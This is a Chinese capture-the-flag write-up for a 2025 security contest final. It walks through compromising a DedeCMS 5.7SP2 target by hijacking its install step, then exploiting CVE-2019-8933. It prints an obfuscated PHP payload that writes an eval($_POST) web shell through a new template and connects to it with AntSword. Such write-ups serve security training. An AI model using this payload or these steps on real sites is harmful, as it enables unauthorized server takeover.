2025软件系统安全大赛决赛backup WP
根据附件发现是dedecms
后台路径是/dede
发现需要密码,尝试爆破失败

在启动环境的时候发现进入了安装页面,但是不知道数据库密码。
想到可以在自己电脑使用phpstudy启动一个数据库服务,然后连接。

默认root用户不能被外网访问,在这里需要新建一个用户,并改一下访问权限

然后用navicat连接root用户改一下刚刚新建用户的权限

本机数据库配置好之后重新启动靶机,趁没有自动安装好之前,自己安装,修改数据库信息即可,其他不变

安装好后,使用默认密码admin:admin登录后台,发现是dedecms 5.7SP2版本

查看给的附件的修改日期发现,file_manage_control.php被修改,file_manage_control.php 文件包含也许被修了,尝试其他漏洞

这里利用CVE-2019-8933(感谢Awesome-POC项目)

在 模板 -> 默认模板管理 -> 新建模板,写入shell,使用poc中可以BYPASS的payload


把GET改成POST方便AntSword连接
<?php
"\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"('./shell.php', "<?php eva" . "l(\$_POS" . "T[a]);");
在 模块 -> 文件管理器 ,修改刚刚新建的模板的文件后缀为php

然后访问
http://URL/templets/default/newtpl.php
发现被成功解析
在当前目录生成了shell.php

使用AntSword连接http://URL/templets/default/shell.php即可


在根目录发现flag


浙公网安备 33010602011771号